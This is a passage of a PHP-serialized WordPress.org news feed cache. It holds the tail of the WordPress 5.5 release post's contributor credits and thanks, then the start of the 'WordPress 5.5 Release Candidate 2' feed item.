href=\"https://profiles.wordpress.org/matveb/\">Matias Ventura</a>, <a href=\"https://profiles.wordpress.org/matjack1/\">matjack1</a>, <a href=\"https://profiles.wordpress.org/webdevmattcrom/\">Matt Cromwell</a>, <a href=\"https://profiles.wordpress.org/matt/\">Matt Mullenweg</a>, <a href=\"https://profiles.wordpress.org/mattrad/\">Matt Radford</a>, <a href=\"https://profiles.wordpress.org/veraxus/\">Matt van Andel</a>, <a href=\"https://profiles.wordpress.org/mattchowning/\">mattchowning</a>, <a href=\"https://profiles.wordpress.org/mboynes/\">Matthew Boynes</a>, <a href=\"https://profiles.wordpress.org/mattheweppelsheimer/\">Matthew Eppelsheimer</a>, <a href=\"https://profiles.wordpress.org/beatpanda/\">Matthew Gerring</a>, <a href=\"https://profiles.wordpress.org/kittmedia/\">Matthias Kittsteiner</a>, <a href=\"https://profiles.wordpress.org/pfefferle/\">Matthias Pfefferle</a>, <a href=\"https://profiles.wordpress.org/matthieumota/\">Matthieu Mota</a>, <a href=\"https://profiles.wordpress.org/mattyrob/\">mattyrob</a>, <a href=\"https://profiles.wordpress.org/maximeculea/\">Maxime Culea</a>, <a href=\"https://profiles.wordpress.org/maxpertici/\">Maxime Pertici</a>, <a href=\"https://profiles.wordpress.org/maxme/\">maxme</a>, <a href=\"https://profiles.wordpress.org/mayankmajeji/\">Mayank Majeji</a>, <a href=\"https://profiles.wordpress.org/mcshane/\">mcshane</a>, <a href=\"https://profiles.wordpress.org/melchoyce/\">Mel Choyce-Dwan</a>, <a href=\"https://profiles.wordpress.org/menakas/\">Menaka S.</a>, <a href=\"https://profiles.wordpress.org/mensmaximus/\">mensmaximus</a>, <a href=\"https://profiles.wordpress.org/metalandcoffee/\">metalandcoffee</a>, <a href=\"https://profiles.wordpress.org/lilmike/\">Michael</a>, <a href=\"https://profiles.wordpress.org/michaelarestad/\">Michael Arestad</a>, <a href=\"https://profiles.wordpress.org/michael-arestad/\">Michael Arestad</a>, <a href=\"https://profiles.wordpress.org/mfields/\">Michael Fields</a>, <a href=\"https://profiles.wordpress.org/mnelson4/\">Michael Nelson</a>, <a href=\"https://profiles.wordpress.org/m_butcher/\">Michele Butcher-Jones</a>, <a href=\"https://profiles.wordpress.org/marktimemedia/\">Michelle</a>, <a href=\"https://profiles.wordpress.org/mcsf/\">Miguel Fonseca</a>, <a href=\"https://profiles.wordpress.org/mihdan/\">mihdan</a>, <a href=\"https://profiles.wordpress.org/miinasikk/\">Miina Sikk</a>, <a href=\"https://profiles.wordpress.org/simison/\">Mikael Korpela</a>, <a href=\"https://profiles.wordpress.org/mikaumoto/\">mikaumoto</a>, <a href=\"https://profiles.wordpress.org/mihai2u/\">Mike Crantea</a>, <a href=\"https://profiles.wordpress.org/mdgl/\">Mike Glendinning</a>, <a href=\"https://profiles.wordpress.org/mike-haydon-swo/\">Mike Haydon</a>, <a href=\"https://profiles.wordpress.org/mikeschinkel/\">Mike Schinkel [WPLib Box project lead]</a>, <a href=\"https://profiles.wordpress.org/mikeschroder/\">Mike Schroder</a>, <a href=\"https://profiles.wordpress.org/mikeyarce/\">Mikey Arce</a>, <a href=\"https://profiles.wordpress.org/milana_cap/\">Milana Cap</a>, <a href=\"https://profiles.wordpress.org/milindmore22/\">Milind More</a>, <a href=\"https://profiles.wordpress.org/mimitips/\">mimi</a>, <a href=\"https://profiles.wordpress.org/mislavjuric/\">mislavjuric</a>, <a href=\"https://profiles.wordpress.org/batmoo/\">Mohammad Jangda</a>, <a href=\"https://profiles.wordpress.org/opurockey/\">Mohammad Rockeybul Alam</a>, <a href=\"https://profiles.wordpress.org/mohsinrasool/\">Mohsin Rasool</a>, <a href=\"https://profiles.wordpress.org/monikarao/\">Monika Rao</a>, <a href=\"https://profiles.wordpress.org/gwendydd/\">Morgan Kay</a>, <a href=\"https://profiles.wordpress.org/mor10/\">Morten Rand-Hendriksen</a>, <a href=\"https://profiles.wordpress.org/man4toman/\">Morteza Geransayeh</a>, <a href=\"https://profiles.wordpress.org/mt8biz/\">moto hachi ( mt8.biz )</a>, <a href=\"https://profiles.wordpress.org/mrgrt/\">mrgrt</a>, <a href=\"https://profiles.wordpress.org/mrmist/\">mrmist</a>, <a href=\"https://profiles.wordpress.org/mrtall/\">mrTall</a>, <a href=\"https://profiles.wordpress.org/msaggiorato/\">msaggiorato</a>, <a href=\"https://profiles.wordpress.org/musamamasood/\">Muhammad Usama Masood</a>, <a href=\"https://profiles.wordpress.org/mukesh27/\">Mukesh Panchal</a>, <a href=\"https://profiles.wordpress.org/munyagu/\">munyagu</a>, <a href=\"https://profiles.wordpress.org/assassinateur/\">Nadir Seghir</a>, <a href=\"https://profiles.wordpress.org/nfmohit/\">Nahid Ferdous Mohit</a>, <a href=\"https://profiles.wordpress.org/nalininonstopnewsuk/\">Nalini Thakor</a>, <a href=\"https://profiles.wordpress.org/nao/\">Naoko Takano</a>, <a href=\"https://profiles.wordpress.org/narwen/\">narwen</a>, <a href=\"https://profiles.wordpress.org/nateinaction/\">Nate Gay</a>, <a href=\"https://profiles.wordpress.org/nathanrice/\">Nathan Rice</a>, <a href=\"https://profiles.wordpress.org/navidos/\">Navid</a>, <a href=\"https://profiles.wordpress.org/neonkowy/\">neonkowy</a>, <a href=\"https://profiles.wordpress.org/krstarica/\">net</a>, <a href=\"https://profiles.wordpress.org/netpassprodsr/\">netpassprodsr</a>, <a href=\"https://profiles.wordpress.org/nextendweb/\">Nextendweb</a>, <a href=\"https://profiles.wordpress.org/calvin_ngan/\">Ngan Tengyuen</a>, <a href=\"https://profiles.wordpress.org/nickdaugherty/\">Nick Daugherty</a>, <a href=\"https://profiles.wordpress.org/nickylimjj/\">Nicky Lim</a>, <a href=\"https://profiles.wordpress.org/vadimnicolai/\">nicolad</a>, <a href=\"https://profiles.wordpress.org/rahe/\">Nicolas Juen</a>, <a href=\"https://profiles.wordpress.org/nicolaskulka/\">NicolasKulka</a>, <a href=\"https://profiles.wordpress.org/jainnidhi/\">Nidhi Jain</a>, <a href=\"https://profiles.wordpress.org/nielsdeblaauw/\">Niels de Blaauw</a>, <a href=\"https://profiles.wordpress.org/nielslange/\">Niels Lange</a>, <a href=\"https://profiles.wordpress.org/nigrosimone/\">nigro.simone</a>, <a href=\"https://profiles.wordpress.org/nikhilbhansi/\">Nikhil Bhansi</a>, <a href=\"https://profiles.wordpress.org/nbachiyski/\">Nikolay Bachiyski</a>, <a href=\"https://profiles.wordpress.org/nilovelez/\">Nilo Velez</a>, <a href=\"https://profiles.wordpress.org/niresh12495/\">Niresh</a>, <a href=\"https://profiles.wordpress.org/nmenescardi/\">nmenescardi</a>, <a href=\"https://profiles.wordpress.org/noahtallen/\">Noah Allen</a>, <a href=\"https://profiles.wordpress.org/ntsekouras/\">ntsekouras</a>, <a href=\"https://profiles.wordpress.org/numidwasnotavailable/\">NumidWasNotAvailable</a>, <a href=\"https://profiles.wordpress.org/oakesjosh/\">oakesjosh</a>, <a href=\"https://profiles.wordpress.org/obliviousharmony/\">obliviousharmony</a>, <a href=\"https://profiles.wordpress.org/ockham/\">ockham</a>, <a href=\"https://profiles.wordpress.org/oglekler/\">Olga Gleckler</a>, <a href=\"https://profiles.wordpress.org/alshakero/\">Omar Alshaker</a>, <a href=\"https://profiles.wordpress.org/onokazu/\">onokazu</a>, <a href=\"https://profiles.wordpress.org/optimizingmatters/\">Optimizing Matters</a>, <a href=\"https://profiles.wordpress.org/ovann86/\">ovann86</a>, <a href=\"https://profiles.wordpress.org/overclokk/\">overclokk</a>, <a href=\"https://profiles.wordpress.org/p_enrique/\">p_enrique</a>, <a href=\"https://profiles.wordpress.org/paaljoachim/\">Paal Joachim Romdahl</a>, <a href=\"https://profiles.wordpress.org/pablohoneyhoney/\">Pablo Honey</a>, <a href=\"https://profiles.wordpress.org/palmiak/\">palmiak</a>, <a href=\"https://profiles.wordpress.org/paresh07/\">Paresh Shinde</a>, <a href=\"https://profiles.wordpress.org/parvand/\">Parvand</a>, <a href=\"https://profiles.wordpress.org/swissspidy/\">Pascal Birchler</a>, <a href=\"https://profiles.wordpress.org/casiepa/\">Pascal Casier</a>, <a href=\"https://profiles.wordpress.org/pbearne/\">Paul Bearne</a>, <a href=\"https://profiles.wordpress.org/pbiron/\">Paul Biron</a>, <a href=\"https://profiles.wordpress.org/pdfernhout/\">Paul Fernhout</a>, <a href=\"https://profiles.wordpress.org/djpaul/\">Paul Gibbs</a>, <a href=\"https://profiles.wordpress.org/figureone/\">Paul Ryan</a>, <a href=\"https://profiles.wordpress.org/paulschreiber/\">Paul Schreiber</a>, <a href=\"https://profiles.wordpress.org/paulstonier/\">Paul Stonier</a>, <a href=\"https://profiles.wordpress.org/pschrottky/\">Paul Von Schrottky</a>, <a href=\"https://profiles.wordpress.org/pavelevap/\">pavelevap</a>, <a href=\"https://profiles.wordpress.org/pedromendonca/\">Pedro Mendon&#231;a</a>, <a href=\"https://profiles.wordpress.org/pentatonicfunk/\">pentatonicfunk</a>, <a href=\"https://profiles.wordpress.org/pputzer/\">pepe</a>, <a href=\"https://profiles.wordpress.org/pessoft/\">Peter \"Pessoft\" Kol&#237;nek</a>, <a href=\"https://profiles.wordpress.org/westi/\">Peter Westwood</a>, <a href=\"https://profiles.wordpress.org/peterwilsoncc/\">Peter Wilson</a>, <a href=\"https://profiles.wordpress.org/pderksen/\">Phil Derksen</a>, <a href=\"https://profiles.wordpress.org/johnstonphilip/\">Phil Johnston</a>, <a href=\"https://profiles.wordpress.org/philipmjackson/\">Philip Jackson</a>, <a href=\"https://profiles.wordpress.org/pierlo/\">Pierre Gordon</a>, <a href=\"https://profiles.wordpress.org/pigdog234/\">pigdog234</a>, <a href=\"https://profiles.wordpress.org/pikamander2/\">pikamander2</a>, <a href=\"https://profiles.wordpress.org/pingram3541/\">pingram</a>, <a href=\"https://profiles.wordpress.org/pionect/\">Pionect</a>, <a href=\"https://profiles.wordpress.org/piyushmca/\">Piyush Patel</a>, <a href=\"https://profiles.wordpress.org/pkarjala/\">pkarjala</a>, <a href=\"https://profiles.wordpress.org/pkvillanueva/\">pkvillanueva</a>, <a href=\"https://profiles.wordpress.org/pmbaldha/\">Prashant Baldha</a>, <a href=\"https://profiles.wordpress.org/pratik028/\">pratik028</a>, <a href=\"https://profiles.wordpress.org/pravinparmar2404/\">Pravin Parmar</a>, <a href=\"https://profiles.wordpress.org/presskopp/\">Presskopp</a>, <a href=\"https://profiles.wordpress.org/presslabs/\">Presslabs</a>, <a href=\"https://profiles.wordpress.org/priyankkpatel/\">Priyank Patel</a>, <a href=\"https://profiles.wordpress.org/priyomukul/\">Priyo Mukul</a>, <a href=\"https://profiles.wordpress.org/prografika/\">ProGrafika</a>, <a href=\"https://profiles.wordpress.org/programmin/\">programmin</a>, <a href=\"https://profiles.wordpress.org/puneetsahalot/\">Puneet Sahalot</a>, <a href=\"https://profiles.wordpress.org/pvogel2/\">pvogel2</a>, <a href=\"https://profiles.wordpress.org/r-a-y/\">r-a-y</a>, <a href=\"https://profiles.wordpress.org/raajtram/\">Raaj Trambadia</a>, <a href=\"https://profiles.wordpress.org/larrach/\">Rachel Peter</a>, <a href=\"https://profiles.wordpress.org/raineorshine/\">raine</a>, <a href=\"https://profiles.wordpress.org/superpoincare/\">Ramanan</a>, <a href=\"https://profiles.wordpress.org/ramiy/\">Rami Yushuvaev</a>, <a href=\"https://profiles.wordpress.org/rastaban/\">Rastaban</a>, <a href=\"https://profiles.wordpress.org/ravanh/\">RavanH</a>, <a href=\"https://profiles.wordpress.org/ravatparmar/\">Ravat Parmar</a>, <a href=\"https://profiles.wordpress.org/ravenswd/\">ravenswd</a>, <a href=\"https://profiles.wordpress.org/rawrly/\">rawrly</a>, <a href=\"https://profiles.wordpress.org/rebasaurus/\">rebasaurus</a>, <a href=\"https://profiles.wordpress.org/redsand/\">Red Sand Media Group</a>, <a href=\"https://profiles.wordpress.org/tabrisrp/\">Remy Perona</a>, <a href=\"https://profiles.wordpress.org/remzicavdar/\">Remzi Cavdar</a>, <a href=\"https://profiles.wordpress.org/renathoc/\">Renatho</a>, <a href=\"https://profiles.wordpress.org/renggo888/\">renggo888</a>, <a href=\"https://profiles.wordpress.org/retlehs/\">retlehs</a>, <a href=\"https://profiles.wordpress.org/retrofox/\">retrofox</a>, <a href=\"https://profiles.wordpress.org/youknowriad/\">Riad Benguella</a>, <a href=\"https://profiles.wordpress.org/rianrietveld/\">Rian Rietveld</a>, <a href=\"https://profiles.wordpress.org/riasat/\">riasat</a>, <a href=\"https://profiles.wordpress.org/richtabor/\">Rich Tabor</a>, <a href=\"https://profiles.wordpress.org/ringisha/\">Ringisha</a>, <a href=\"https://profiles.wordpress.org/ritterml/\">ritterml</a>, <a href=\"https://profiles.wordpress.org/rnaby/\">Rnaby</a>, <a href=\"https://profiles.wordpress.org/rcutmore/\">Rob Cutmore</a>, <a href=\"https://profiles.wordpress.org/dhrrob/\">Rob Migchels</a>, <a href=\"https://profiles.wordpress.org/rob006/\">rob006</a>, <a href=\"https://profiles.wordpress.org/noisysocks/\">Robert Anderson</a>, <a href=\"https://profiles.wordpress.org/miqrogroove/\">Robert Chapin</a>, <a href=\"https://profiles.wordpress.org/robertpeake/\">Robert Peake</a>, <a href=\"https://profiles.wordpress.org/nullbyte/\">Robert Windisch</a>, <a href=\"https://profiles.wordpress.org/ronalfy/\">Ronald Huereca</a>, <a href=\"https://profiles.wordpress.org/costasovo/\">Rostislav Woln&#253;</a>, <a href=\"https://profiles.wordpress.org/roytanck/\">Roy Tanck</a>, <a href=\"https://profiles.wordpress.org/ruxandra/\">ruxandra</a>, <a href=\"https://profiles.wordpress.org/ryan/\">Ryan Boren</a>, <a href=\"https://profiles.wordpress.org/bookdude13/\">Ryan Fredlund</a>, <a href=\"https://profiles.wordpress.org/ryankienstra/\">Ryan Kienstra</a>, <a href=\"https://profiles.wordpress.org/rmccue/\">Ryan McCue</a>, <a href=\"https://profiles.wordpress.org/welcher/\">Ryan Welcher</a>, <a href=\"https://profiles.wordpress.org/ryotasakamoto/\">Ryota Sakamoto</a>, <a href=\"https://profiles.wordpress.org/ryotsun/\">ryotsun</a>, <a href=\"https://profiles.wordpress.org/soean/\">S&#246;ren Wrede</a>, <a href=\"https://profiles.wordpress.org/sorenbronsted/\">S&#248;ren Br&#248;nsted</a>, <a href=\"https://profiles.wordpress.org/sachittandukar/\">Sachit Tandukar</a>, <a href=\"https://profiles.wordpress.org/sagarjadhav/\">Sagar Jadhav</a>, <a href=\"https://profiles.wordpress.org/sajjad67/\">Sajjad Hossain Sagor</a>, <a href=\"https://profiles.wordpress.org/salcode/\">Sal Ferrarello</a>, <a href=\"https://profiles.wordpress.org/salvatoreformisano/\">Salvatore Formisano</a>, <a href=\"https://profiles.wordpress.org/samful/\">Sam Fullalove</a>, <a href=\"https://profiles.wordpress.org/sswebster/\">Sam Webster</a>, <a href=\"https://profiles.wordpress.org/solarissmoke/\">Samir Shah</a>, <a href=\"https://profiles.wordpress.org/otto42/\">Samuel Wood (Otto)</a>, <a href=\"https://profiles.wordpress.org/samueljseay/\">samueljseay</a>, <a href=\"https://profiles.wordpress.org/pacifika/\">Sander van Dragt</a>, <a href=\"https://profiles.wordpress.org/progremzion/\">Sanket Mehta</a>, <a href=\"https://profiles.wordpress.org/sarahricker/\">sarahricker</a>, <a href=\"https://profiles.wordpress.org/sathyapulse/\">Sathiyamoorthy V</a>, <a href=\"https://profiles.wordpress.org/sayedwp/\">Sayed Taqui</a>, <a href=\"https://profiles.wordpress.org/scarolan/\">scarolan</a>, <a href=\"https://profiles.wordpress.org/scholdstrom/\">scholdstrom</a>, <a href=\"https://profiles.wordpress.org/sc0ttkclark/\">Scott Kingsley Clark</a>, <a href=\"https://profiles.wordpress.org/coffee2code/\">Scott Reilly</a>, <a href=\"https://profiles.wordpress.org/scottsmith/\">Scott Smith</a>, <a href=\"https://profiles.wordpress.org/wonderboymusic/\">Scott Taylor</a>, <a href=\"https://profiles.wordpress.org/scribu/\">scribu</a>, <a href=\"https://profiles.wordpress.org/scruffian/\">scruffian</a>, <a href=\"https://profiles.wordpress.org/seanchayes/\">Sean Hayes</a>, <a href=\"https://profiles.wordpress.org/seanpaulrasmussen/\">seanpaulrasmussen</a>, <a href=\"https://profiles.wordpress.org/seayou/\">seayou</a>, <a href=\"https://profiles.wordpress.org/senatorman/\">senatorman</a>, <a href=\"https://profiles.wordpress.org/sergeybiryukov/\">Sergey Biryukov</a>, <a href=\"https://profiles.wordpress.org/vjik/\">Sergey Predvoditelev</a>, <a href=\"https://profiles.wordpress.org/sgr33n/\">Sergio de Falco</a>, <a href=\"https://profiles.wordpress.org/sergiomdgomes/\">sergiomdgomes</a>, <a href=\"https://profiles.wordpress.org/functionalrhyme/\">Shannon Smith</a>, <a href=\"https://profiles.wordpress.org/wpshades/\">Shantanu Desai</a>, <a href=\"https://profiles.wordpress.org/shaunandrews/\">shaunandrews</a>, <a href=\"https://profiles.wordpress.org/shooper/\">Shawn Hooper</a>, <a href=\"https://profiles.wordpress.org/shawnz/\">shawnz</a>, <a href=\"https://profiles.wordpress.org/shital-patel/\">Shital Marakana</a>, <a href=\"https://profiles.wordpress.org/shulard/\">shulard</a>, <a href=\"https://profiles.wordpress.org/siliconforks/\">siliconforks</a>, <a href=\"https://profiles.wordpress.org/simonwheatley/\">Simon Wheatley</a>, <a href=\"https://profiles.wordpress.org/simonjanin/\">simonjanin</a>, <a href=\"https://profiles.wordpress.org/sinatrateam/\">sinatrateam</a>, <a href=\"https://profiles.wordpress.org/sjmur/\">sjmur</a>, <a href=\"https://profiles.wordpress.org/skarabeq/\">skarabeq</a>, <a href=\"https://profiles.wordpress.org/skorasaurus/\">skorasaurus</a>, <a href=\"https://profiles.wordpress.org/skoskie/\">skoskie</a>, <a href=\"https://profiles.wordpress.org/slushman/\">slushman</a>, <a href=\"https://profiles.wordpress.org/snapfractalpop/\">snapfractalpop</a>, <a href=\"https://profiles.wordpress.org/seth17/\">SpearsMarketing</a>, <a href=\"https://profiles.wordpress.org/sphakka/\">sphakka</a>, <a href=\"https://profiles.wordpress.org/squarecandy/\">squarecandy</a>, <a href=\"https://profiles.wordpress.org/sreedoap/\">sreedoap</a>, <a href=\"https://profiles.wordpress.org/sstoqnov/\">Stanimir Stoyanov</a>, <a href=\"https://profiles.wordpress.org/ryokuhi/\">Stefano Minoia</a>, <a href=\"https://profiles.wordpress.org/hypest/\">Stefanos Togoulidis</a>, <a href=\"https://profiles.wordpress.org/sswells/\">Steph Wells</a>, <a href=\"https://profiles.wordpress.org/sabernhardt/\">Stephen Bernhardt</a>, <a href=\"https://profiles.wordpress.org/stephencronin/\">Stephen Cronin</a>, <a href=\"https://profiles.wordpress.org/netweb/\">Stephen Edgar</a>, <a href=\"https://profiles.wordpress.org/dufresnesteven/\">Steve Dufresne</a>, <a href=\"https://profiles.wordpress.org/stevegibson12/\">stevegibson12</a>, <a href=\"https://profiles.wordpress.org/sterndata/\">Steven Stern (sterndata)</a>, <a href=\"https://profiles.wordpress.org/stevenkword/\">Steven Word</a>, <a href=\"https://profiles.wordpress.org/stevenkussmaul/\">stevenkussmaul</a>, <a href=\"https://profiles.wordpress.org/stevenlinx/\">stevenlinx</a>, <a href=\"https://profiles.wordpress.org/stiofansisland/\">Stiofan</a>, <a href=\"https://profiles.wordpress.org/subrataemfluence/\">Subrata Sarkar</a>, <a href=\"https://profiles.wordpress.org/sum1/\">SUM1</a>, <a href=\"https://profiles.wordpress.org/quadthemes/\">Sunny</a>, <a href=\"https://profiles.wordpress.org/sunnyratilal/\">Sunny Ratilal</a>, <a href=\"https://profiles.wordpress.org/sushyant/\">Sushyant Zavarzadeh</a>, <a href=\"https://profiles.wordpress.org/suzylah/\">suzylah</a>, <a href=\"https://profiles.wordpress.org/cybr/\">Sybre Waaijer</a>, <a href=\"https://profiles.wordpress.org/synchro/\">Synchro</a>, <a href=\"https://profiles.wordpress.org/sergioestevao/\">Sérgio Estêvão</a>, <a href=\"https://profiles.wordpress.org/miyauchi/\">Takayuki Miyauchi</a>, <a href=\"https://profiles.wordpress.org/karmatosed/\">Tammie Lister</a>, <a href=\"https://profiles.wordpress.org/tangrufus/\">Tang Rufus</a>, <a href=\"https://profiles.wordpress.org/utz119/\">TeBenachi</a>, <a href=\"https://profiles.wordpress.org/tessawatkinsllc/\">Tessa Watkins LLC</a>, <a href=\"https://profiles.wordpress.org/wildworks/\">Tetsuaki Hamano</a>, <a href=\"https://profiles.wordpress.org/themiked/\">theMikeD</a>, <a href=\"https://profiles.wordpress.org/theolg/\">theolg</a>, <a href=\"https://profiles.wordpress.org/tweetythierry/\">Thierry Muller</a>, <a href=\"https://profiles.wordpress.org/thimalw/\">thimalw</a>, <a href=\"https://profiles.wordpress.org/webzunft/\">Thomas M</a>, <a href=\"https://profiles.wordpress.org/tfrommen/\">Thorsten Frommen</a>, <a href=\"https://profiles.wordpress.org/thrijith/\">Thrijith Thankachan</a>, <a href=\"https://profiles.wordpress.org/tiagohillebrandt/\">Tiago Hillebrandt</a>, <a href=\"https://profiles.wordpress.org/tillkruess/\">Till Kr&#252;ss</a>, <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>, <a href=\"https://profiles.wordpress.org/tkama/\">Tkama</a>, <a href=\"https://profiles.wordpress.org/tmdesigned/\">tmdesigned</a>, <a href=\"https://profiles.wordpress.org/tmoore41/\">tmoore41</a>, <a href=\"https://profiles.wordpress.org/tobiasbg/\">TobiasBg</a>, <a href=\"https://profiles.wordpress.org/tobifjellner/\">tobifjellner (Tor-Bjorn Fjellner)</a>, <a href=\"https://profiles.wordpress.org/tofandel/\">Tofandel</a>, <a href=\"https://profiles.wordpress.org/tomdude/\">tomdude</a>, <a href=\"https://profiles.wordpress.org/tferry/\">Tommy Ferry</a>, <a href=\"https://profiles.wordpress.org/starbuck/\">Tony G</a>, <a href=\"https://profiles.wordpress.org/toro_unit/\">Toro_Unit (Hiroshi Urabe)</a>, <a href=\"https://profiles.wordpress.org/torres126/\">torres126</a>, <a href=\"https://profiles.wordpress.org/zodiac1978/\">Torsten Landsiedel</a>, <a href=\"https://profiles.wordpress.org/toru/\">Toru Miki</a>, <a href=\"https://profiles.wordpress.org/travisnorthcutt/\">Travis Northcutt</a>, <a href=\"https://profiles.wordpress.org/treecutter/\">treecutter</a>, <a href=\"https://profiles.wordpress.org/truongwp/\">truongwp</a>, <a href=\"https://profiles.wordpress.org/tsimmons/\">tsimmons</a>, <a href=\"https://profiles.wordpress.org/dinhtungdu/\">Tung Du</a>, <a href=\"https://profiles.wordpress.org/desaiuditd/\">Udit Desai</a>, <a href=\"https://profiles.wordpress.org/grapplerulrich/\">Ulrich</a>, <a href=\"https://profiles.wordpress.org/vagios/\">Vagios Vlachos</a>, <a href=\"https://profiles.wordpress.org/valchovski/\">valchovski</a>, <a href=\"https://profiles.wordpress.org/valentinbora/\">Valentin Bora</a>, <a href=\"https://profiles.wordpress.org/vayu/\">Vayu Robins</a>, <a href=\"https://profiles.wordpress.org/veromary/\">veromary</a>, <a href=\"https://profiles.wordpress.org/szepeviktor/\">Viktor Sz&#233;pe</a>, <a href=\"https://profiles.wordpress.org/vinkla/\">vinkla</a>, <a href=\"https://profiles.wordpress.org/virginienacci/\">virginienacci</a>, <a href=\"https://profiles.wordpress.org/planvova/\">Vladimir</a>, <a href=\"https://profiles.wordpress.org/vabrashev/\">Vladislav Abrashev</a>, <a href=\"https://profiles.wordpress.org/vortfu/\">vortfu</a>, <a href=\"https://profiles.wordpress.org/voyager131/\">voyager131</a>, <a href=\"https://profiles.wordpress.org/vtieu/\">vtieu</a>, <a href=\"https://profiles.wordpress.org/webaware/\">webaware</a>, <a href=\"https://profiles.wordpress.org/westonruter/\">Weston Ruter</a>, <a href=\"https://profiles.wordpress.org/earnjam/\">William Earnhardt</a>, <a href=\"https://profiles.wordpress.org/williampatton/\">williampatton</a>, <a href=\"https://profiles.wordpress.org/planningwrite/\">Winstina</a>, <a href=\"https://profiles.wordpress.org/wpdesk/\">wpdesk</a>, <a href=\"https://profiles.wordpress.org/wpdo5ea/\">WPDO</a>, <a href=\"https://profiles.wordpress.org/alexandreb3/\">WPMarmite</a>, <a href=\"https://profiles.wordpress.org/wppinar/\">wppinar</a>, <a href=\"https://profiles.wordpress.org/yahil/\">Yahil Madakiya</a>, <a href=\"https://profiles.wordpress.org/yashrs/\">yashrs</a>, <a href=\"https://profiles.wordpress.org/yoancutillas/\">yoancutillas</a>, <a href=\"https://profiles.wordpress.org/yohannp/\">yohannp</a>, <a href=\"https://profiles.wordpress.org/yuhin/\">yuhin</a>, <a href=\"https://profiles.wordpress.org/fierevere/\">Yui</a>, <a href=\"https://profiles.wordpress.org/ysalame/\">Yuri Salame</a>, <a href=\"https://profiles.wordpress.org/yvettesonneveld/\">Yvette Sonneveld</a>, <a href=\"https://profiles.wordpress.org/tollmanz/\">Zack Tollman</a>, <a href=\"https://profiles.wordpress.org/zaheerahmad/\">zaheerahmad</a>, <a href=\"https://profiles.wordpress.org/zakkath/\">zakkath</a>, <a href=\"https://profiles.wordpress.org/zebulan/\">Zebulan Stanphill</a>, <a href=\"https://profiles.wordpress.org/zieladam/\">zieladam</a>, and <a href=\"https://profiles.wordpress.org/chesio/\">Česlav Przywara</a>.\n\n\n\n<p>&nbsp;</p>\n\n\n\n<p>Many thanks to all of the community volunteers who contribute in the&nbsp;<a href=\"https://wordpress.org/support/\">support forums</a>. They answer questions from people across the world, whether they are using WordPress for the first time or since the first release. These releases are more successful for their efforts!</p>\n\n\n\n<p>Finally, thanks to all the community translators who worked on WordPress 5.5. Their efforts bring WordPress fully translated to&nbsp;46 languages at release time, with more on the way.</p>\n\n\n\n<p>If you want to learn more about volunteering with WordPress, check out&nbsp;<a href=\"https://make.wordpress.org/\">Make WordPress</a>&nbsp;or the&nbsp;<a href=\"https://make.wordpress.org/core/\">core development blog</a>.</p>\n</div>\n\n\n\n<div class=\"wp-block-column\" style=\"flex-basis:2%\"></div>\n</div>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:30:\"com-wordpress:feed-additions:1\";a:1:{s:7:\"post-id\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"8799\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:63:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"WordPress 5.5 Release Candidate 2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:69:\"https://wordpress.org/news/2020/08/wordpress-5-5-release-candidate-2/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 04 Aug 2020 19:12:30 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:11:\"Development\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:8:\"Releases\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:3:\"5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8764\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:420:\"The second release candidate for WordPress 5.5 is here! WordPress 5.5 is slated for release&#160;on&#160;August 11, 2020, but we need&#160;your&#160;help to get there—if you haven’t tried 5.5 yet,&#160;now is the time! You can test the WordPress 5.5 release candidate in two ways: Try the&#160;WordPress Beta Tester&#160;plugin (choose the “bleeding edge nightlies” option) Or&#160;download the release [&#8230;]\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jake 